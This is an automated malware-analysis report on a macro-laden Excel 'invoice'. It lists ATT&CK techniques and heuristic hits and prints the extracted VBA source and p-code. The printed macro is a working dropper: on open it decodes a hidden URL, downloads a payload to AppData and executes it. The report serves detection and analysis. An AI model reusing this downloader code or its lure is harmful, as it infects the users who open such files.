MALICIOUS
216
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
T1566.001 Spearphishing Attachment
The sample is an Excel document containing VBA macros. The Workbook_Open macro is triggered when the document is opened, and it attempts to download a second-stage payload from the URL "fyf/ghyehy0uigVO0npd/njbebssfiztfmjsvc00;tquui" to the user's AppData directory. The "Note: Enable content to display this invoice." message serves as a lure to encourage macro execution.
Heuristics 7
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Private Declare PtrSafe Function gFFhpBexdAS Lib "urlmon" Alias _ "URLDownloadToFileA" (ByVal sSeXqZwgrwtEVkst As Long, ByVal CbUyAhnGOEkfgejTbiyY As String, _ ByVal YpfhYy As String, ByVal bFDlZulcp As Long, ByVal AjiVVxFRuNtRjv As Long) As Long -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
DLMKPBuBfsrHLOFfunWEHcEDLMKPBuBfsrHLOFfunWEHcE = Decrypt("fyf/uuse") IWhBPCpPmlNvIWhBPCpPmlNv = Environ$("AppData") & "\" & DLMKPBuBfsrHLOFfunWEHcEDLMKPBuBfsrHLOFfunWEHcE -
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12838 bytes |
SHA-256: 859e55877b3b3bad5d3b457ae77b33451ec6cbefc67ac84e5fda4df5ae8e1f47 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Bill()
End Sub
Attribute VB_Name = "KFLkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function etTime Lib "winmm.dll" () As Long
Private Declare Function timeGetTime Lib "winmm.dll" () As Long
Private Declare PtrSafe Function imeGetTime Lib "winmm.dll" () As Long
Private Declare PtrSafe Function BQxDWfUAvwuz Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal jhbtqMwHMJUmn As Long, ByVal IJSrXBQxDW As String, _
ByVal fUAvwuzke As String, ByVal lOqbrvxpOr As String, ByVal VGCqLBsGQzz As String, ByVal mYzV As Long) As Long
Private Declare PtrSafe Function gFFhpBexdAS Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal sSeXqZwgrwtEVkst As Long, ByVal CbUyAhnGOEkfgejTbiyY As String, _
ByVal YpfhYy As String, ByVal bFDlZulcp As Long, ByVal AjiVVxFRuNtRjv As Long) As Long
Private Declare PtrSafe Function meGetTime Lib "winmm.dll" () As Long
Sub MyCcCNHZWtPogcoFTpdm()
Dim GdzXeZloDYZktoRhAUniXGdzXeZloDYZktoRhAUniXn As String
Dim DLMKPBuBfsrHLOFfunWEHcEDLMKPBuBfsrHLOFfunWEHcE As String
Dim IWhBPCpPmlNvIWhBPCpPmlNv As String
Dim JEikQJMGMFhvvVHVM As String
Dim qyoTddHGVHDMHGFgkjJYGYFMukjb As String
Dim bgDKRwIIXcfWvKDnUXsUbgDKRwIIXcfWvKDnUXsU As String
DLMKPBuBfsrHLOFfunWEHcEDLMKPBuBfsrHLOFfunWEHcE = Decrypt("fyf/uuse")
IWhBPCpPmlNvIWhBPCpPmlNv = Environ$("AppData") & "\" & DLMKPBuBfsrHLOFfunWEHcEDLMKPBuBfsrHLOFfunWEHcE
GdzXeZloDYZktoRhAUniXGdzXeZloDYZktoRhAUniXn = Decrypt("fyf/ghyehy0uigVO0npd/njbebssfiztfmjsvc00;tquui")
gFFhpBexdAS 0, GdzXeZloDYZktoRhAUniXGdzXeZloDYZktoRhAUniXn, IWhBPCpPmlNvIWhBPCpPmlNv, 0, 0
BQxDWfUAvwuz 0, "open", IWhBPCpPmlNvIWhBPCpPmlNv, "", vbNullString, vbNormalFocus
End Sub
Function lashed(urgerorgan, bonusshoot)
qoxnwkqnhfshhimr = "*" & burgerorgan & "*"
Dim be3a8c1f30f1abadd648e22b16fdb57d3 As Double
Dim pe3a8c1f30f1abadd648e22b16fdb57z3 As Variant
pe3a8c1f30f1abadd648e22b16fdb57z3 = -678.507
be3a8c1f30f1abadd648e22b16fdb57d3 = 642.162
Dim columnwall As Byte
Function Tashed(urgerorgan, bonusshoot)
qoxnwkqnhfshhimr = "*" & burgerorgan & "*"
Dim Pe3a8c1f30f1abadd648e22b16fdb87d3 As Double
Dim pe3a8c1f30f1abadd648e22b16fdb87z3 As Variant
pe3a8c1f30f1abadd648e22b16fdb57z3 = -678.507
be3a8c1f30f1abadd648e22b16fdb57d3 = 642.162
Dim columnwall As Variant
Function Dashed(urgerorgan, bonusshoot)
qoxnwkqnhfshhimr = "*" & burgerorgan & "*"
Dim Ue3a8c1f30f1abadd648e22b16fdb97d3 As Double
Dim Ue3a8c1f30f1abadd648e22b16fdb97z3 As Variant
pe3a8c1f30f1abadd648e22b16fdb57z3 = -678.507
be3a8c1f30f1abadd648e22b16fdb57d3 = 642.162
Dim columnwall As Variant
Function Hashed(urgerorgan, bonusshoot)
qoxnwkqnhfshhimr = "*" & burgerorgan & "*"
Dim ve3a8c1f30f1abadd648e22b16fdb77d3 As Double
Dim ve3a8c1f30f1abadd648e22b16fdb77z3 As Single
pe3a8c1f30f1abadd648e22b16fdb57z3 = -678.507
be3a8c1f30f1abadd648e22b16fdb57d3 = 642.162
Dim columnwall As Variant
Function rnIkDDisHp4e1dEwtDO8XRgW() As Currency
Call t5IOznwCrl
End Function
Static Function t5IOznwCrl() As Integer
Call W6kt90kDRkudpcs1fW4Dp62rz
End Function
Function W6kt90kDRkudpcs1fW4Dp62rz() As Single
Call Jb8AvPk2VR
End Function
Static Function Jb8AvPk2VR() As Date
Call BHyE3XYkFXIADNkqTJW8h3uw
End Function
Function BHyE3XYkFXIADNkqTJW8h3uw() As Variant
Call JxU0xFkI7x
End Function
Static Function JxU0xFkI7x() As Date
Call xS2rvCsRX6OdVekrzGwrPUM9
End Function
Function xS2rvCsRX6OdVekrzGwrPUM9() As Variant
Call hx2errEArb
End Function
Static Function hx2errEArb() As Double
Call WCbBQoVfs4z78EDlkYXBK4r3
End Function
Function WCbBQoVfs4z78EDlkYXBK4r3() As Single
Call FZ4yZPaWVH
End Function
Sub Workbook_Open()
MyCcCNHZWtPogcoFTpdm
End Sub
Function Decrypt(enc)
Dim x, n, AppData, asil As Byte
enc = StrReverse(enc)
For n = 1 To Len(enc)
x = Mid(enc, n, 1)
AppData = AppData & Chr(Asc(x) - 1)
Next
Decrypt = AppData
For asil = 1 To Len(NUi)
Next
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /tmp/qstore_fabs5sdr
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 951 bytes
' Line #0:
' FuncDefn (Sub timeGetTime())
' Line #1:
' Line #2:
' EndSub
' _VBA_PROJECT_CUR/VBA/KFLkbook - 10838 bytes
' Line #0:
' FuncDefn (Private Declare Function BQxDWfUAvwuz Lib "jhbtqMwHMJUmn" () As Long)
' Line #1:
' Line #2:
' FuncDefn (Private Declare Function IJSrXBQxDW Lib "jhbtqMwHMJUmn" () As Long)
' Line #3:
' Line #4:
' FuncDefn (Private Declare PtrSafe Function fUAvwuzke Lib "jhbtqMwHMJUmn" () As Long)
' Line #5:
' Line #6:
' LineCont 0x0008 08 00 00 00 14 00 00 00
' FuncDefn (Private Declare PtrSafe Function lOqbrvxpOr Lib "YpfhYy" (ByVal VGCqLBsGQzz As Long, ByVal mYzV As String, ByVal shell32.dll As String, ByVal gFFhpBexdAS As String, ByVal sSeXqZwgrwtEVkst As String, ByVal CbUyAhnGOEkfgejTbiyY As Long) As Long)
' Line #7:
' Line #8:
' LineCont 0x0008 08 00 00 00 14 00 00 00
' FuncDefn (Private Declare PtrSafe Function bFDlZulcp Lib "DLMKPBuBfsrHLOFfunWEHcEDLMKPBuBfsrHLOFfunWEHcE" (ByVal AjiVVxFRuNtRjv As Long, ByVal urlmon As String, ByVal meGetTime As String, ByVal MyCcCNHZWtPogcoFTpdm As Long, ByVal GdzXeZloDYZktoRhAUniXGdzXeZloDYZktoRhAUniXn As Long) As Long)
' Line #9:
' Line #10:
' FuncDefn (Private Declare PtrSafe Function IWhBPCpPmlNvIWhBPCpPmlNv Lib "jhbtqMwHMJUmn" () As Long)
' Line #11:
' Line #12:
' FuncDefn (Sub JEikQJMGMFhvvVHVM())
' Line #13:
' Dim
' VarDefn qyoTddHGVHDMHGFgkjJYGYFMukjb (As String)
' Line #14:
' Dim
' VarDefn bgDKRwIIXcfWvKDnUXsUbgDKRwIIXcfWvKDnUXsU (As String)
' Line #15:
' Dim
' VarDefn Decrypt (As String)
' Line #16:
' Dim
' VarDefn Environ (As String)
' Line #17:
' Dim
' VarDefn vbNullString (As String)
' Line #18:
' Dim
' VarDefn vbNormalFocus (As String)
' Line #19:
' LitStr 0x0008 "fyf/uuse"
' ArgsLd lashed 0x0001
' St bgDKRwIIXcfWvKDnUXsUbgDKRwIIXcfWvKDnUXsU
' Line #20:
' LitStr 0x0007 "AppData"
' ArgsLd urgerorgan$ 0x0001
' LitStr 0x0001 "\"
' Concat
' Ld bgDKRwIIXcfWvKDnUXsUbgDKRwIIXcfWvKDnUXsU
' Concat
' St Decrypt
' Line #21:
' Line #22:
' Line #23:
' LitStr 0x002E "fyf/ghyehy0uigVO0npd/njbebssfiztfmjsvc00;tquui"
' ArgsLd lashed 0x0001
' St qyoTddHGVHDMHGFgkjJYGYFMukjb
' Line #24:
' Line #25:
' LitDI2 0x0000
' Ld qyoTddHGVHDMHGFgkjJYGYFMukjb
' Ld Decrypt
' LitDI2 0x0000
' LitDI2 0x0000
' ArgsCall bFDlZulcp 0x0005
' Line #26:
' LitDI2 0x0000
' LitStr 0x0004 "open"
' Ld Decrypt
' LitStr 0x0000 ""
' Ld bonusshoot
' Ld qoxnwkqnhfshhimr
' ArgsCall lOqbrvxpOr 0x0006
' Line #27:
' EndSub
' Line #28:
' Line #29:
' FuncDefn (Function burgerorgan(be3a8c1f30f1abadd648e22b16fdb57d3, pe3a8c1f30f1abadd648e22b16fdb57z3, id_FFFE As Variant))
' Line #30:
' LitStr 0x0001 "*"
' Ld rnIkDDisHp4e1dEwtDO8XRgW
' Concat
' LitStr 0x0001 "*"
' Concat
' St columnwall
' Line #31:
' Dim
' VarDefn t5IOznwCrl (As Double)
' Line #32:
' Dim
' VarDefn W6kt90kDRkudpcs1fW4Dp62rz (As Variant)
' Line #33:
' LitR8 0x1893 0x5604 0x340E 0x4085
' UMi
' St W6kt90kDRkudpcs1fW4Dp62rz
' Line #34:
' LitR8 0xEF9E 0xC6A7 0x114B 0x4084
' St t5IOznwCrl
' Line #35:
' Dim
' VarDefn Jb8AvPk2VR (As Byte)
' Line #36:
' Line #37:
' FuncDefn (Function Dashed(be3a8c1f30f1abadd648e22b16fdb57d3, pe3a8c1f30f1abadd648e22b16fdb57z3, id_FFFE As Variant))
' Line #38:
' LitStr 0x0001 "*"
' Ld rnIkDDisHp4e1dEwtDO8XRgW
' Concat
' LitStr 0x0001 "*"
' Concat
' St columnwall
' Line #39:
' Dim
' VarDefn Ue3a8c1f30f1abadd648e22b16fdb97d3 (As Double)
' Line #40:
' Dim
' VarDefn Ue3a8c1f30f1abadd648e22b16fdb87z3 (As Variant)
' Line #41:
' LitR8 0x1893 0x5604 0x340E 0x4085
' UMi
' St W6kt90kDRkudpcs1fW4Dp62rz
' Line #42:
' LitR8 0xEF9E 0xC6A7 0x114B 0x4084
' St t5IOznwCrl
' Line #43:
' Dim
' VarDefn Jb8AvPk2VR (As Variant)
' Line #44:
' Line #45:
' FuncDefn (Function Ue3a8c1f30f1abadd648e22b16fdb97z3(be3a8c1f30f1abadd648e22b16fdb57d3, pe3a8c1f30f1abadd648e22b16fdb57z3, id_FFFE As Variant))
' Line #46:
' LitStr 0x0001 "*"
' Ld rnIkDDisHp4e1dEwtDO8XRgW
' Concat
' LitStr 0x0001 "*"
' Concat
' St columnwall
' Line #47:
' Dim
' VarDefn ve3a8c1f30f1abadd648e22b16fdb97z3 (As Double)
' Line #48:
' Dim
' VarDefn ve3a8c1f30f1abadd648e22b16fdb77d3 (As Variant)
' Line #49:
' LitR8 0x1893 0x5604 0x340E 0x4085
' UMi
' St W6kt90kDRkudpcs1fW4Dp62rz
' Line #50:
' LitR8 0xEF9E 0xC6A7 0x114B 0x4084
' St t5IOznwCrl
' Line #51:
' Dim
' VarDefn Jb8AvPk2VR (As Variant)
' Line #52:
' Line #53:
' FuncDefn (Function ve3a8c1f30f1abadd648e22b16fdb77z3(be3a8c1f30f1abadd648e22b16fdb57d3, pe3a8c1f30f1abadd648e22b16fdb57z3, id_FFFE As Variant))
' Line #54:
' LitStr 0x0001 "*"
' Ld rnIkDDisHp4e1dEwtDO8XRgW
' Concat
' LitStr 0x0001 "*"
' Concat
' St columnwall
' Line #55:
' Dim
' VarDefn id_02C6 (As Double)
' Line #56:
' Dim
' VarDefn id_02C8 (As Single)
' Line #57:
' LitR8 0x1893 0x5604 0x340E 0x4085
' UMi
' St W6kt90kDRkudpcs1fW4Dp62rz
' Line #58:
' LitR8 0xEF9E 0xC6A7 0x114B 0x4084
' St t5IOznwCrl
' Line #59:
' Dim
' VarDefn Jb8AvPk2VR (As Variant)
' Line #60:
' Line #61:
' FuncDefn (Function BHyE3XYkFXIADNkqTJW8h3uw(id_FFFE As Currency) As Currency)
' Line #62:
' ArgsCall (Call) JxU0xFkI7x 0x0000
' Line #63:
' EndFunc
' Line #64:
' FuncDefn (Static Function JxU0xFkI7x(id_FFFE As Integer) As Integer)
' Line #65:
' ArgsCall (Call) xS2rvCsRX6OdVekrzGwrPUM9 0x0000
' Line #66:
' EndFunc
' Line #67:
' FuncDefn (Function xS2rvCsRX6OdVekrzGwrPUM9(id_FFFE As Single) As Single)
' Line #68:
' ArgsCall (Call) hx2errEArb 0x0000
' Line #69:
' EndFunc
' Line #70:
' FuncDefn (Static Function hx2errEArb(id_FFFE As Date) As Date)
' Line #71:
' ArgsCall (Call) WCbBQoVfs4z78EDlkYXBK4r3 0x0000
' Line #72:
' EndFunc
' Line #73:
' FuncDefn (Function WCbBQoVfs4z78EDlkYXBK4r3(id_FFFE As Variant) As Variant)
' Line #74:
' ArgsCall (Call) FZ4yZPaWVH 0x0000
' Line #75:
' EndFunc
' Line #76:
' FuncDefn (Static Function FZ4yZPaWVH(id_FFFE As Date) As Date)
' Line #77:
' ArgsCall (Call) Workbook_Open 0x0000
' Line #78:
' EndFunc
' Line #79:
' FuncDefn (Function Workbook_Open(id_FFFE As Variant) As Variant)
' Line #80:
' ArgsCall (Call) enc 0x0000
' Line #81:
' EndFunc
' Line #82:
' FuncDefn (Static Function enc(id_FFFE As Double) As Double)
' Line #83:
' ArgsCall (Call) x 0x0000
' Line #84:
' EndFunc
' Line #85:
' FuncDefn (Function x(id_FFFE As Single) As Single)
' Line #86:
' ArgsCall (Call) n 0x0000
' Line #87:
' EndFunc
' Line #88:
' Line #89:
' FuncDefn (Sub AppData())
' Line #90:
' Line #91:
' ArgsCall JEikQJMGMFhvvVHVM 0x0000
' Line #92:
' EndSub
' Line #93:
' Line #94:
' FuncDefn (Function lashed(asil, id_FFFE As Variant))
' Line #95:
' Dim
' VarDefn StrReverse
' VarDefn Chr
' VarDefn Asc
' VarDefn NUi (As Byte)
' Line #96:
' Ld asil
' ArgsLd Sheet1 0x0001
' St asil
' Line #97:
' StartForVariable
' Ld Chr
' EndForVariable
' LitDI2 0x0001
' Ld asil
' FnLen
' For
' Line #98:
' Ld asil
' Ld Chr
' LitDI2 0x0001
' ArgsLd Mid 0x0003
' St StrReverse
' Line #99:
' Ld Asc
' Ld StrReverse
' ArgsLd Sheet3 0x0001
' LitDI2 0x0001
' Sub
' ArgsLd Sheet2 0x0001
' Concat
' St Asc
' Line #100:
' StartForVariable
' Next
' Line #101:
' Ld Asc
' St lashed
' Line #102:
' StartForVariable
' Ld NUi
' EndForVariable
' LitDI2 0x0001
' Ld Workbook
' FnLen
' For
' Line #103:
' StartForVariable
' Next
' Line #104:
' EndFunc
' Line #105:
' _VBA_PROJECT_CUR/VBA/Sheet1 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 985 bytes
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.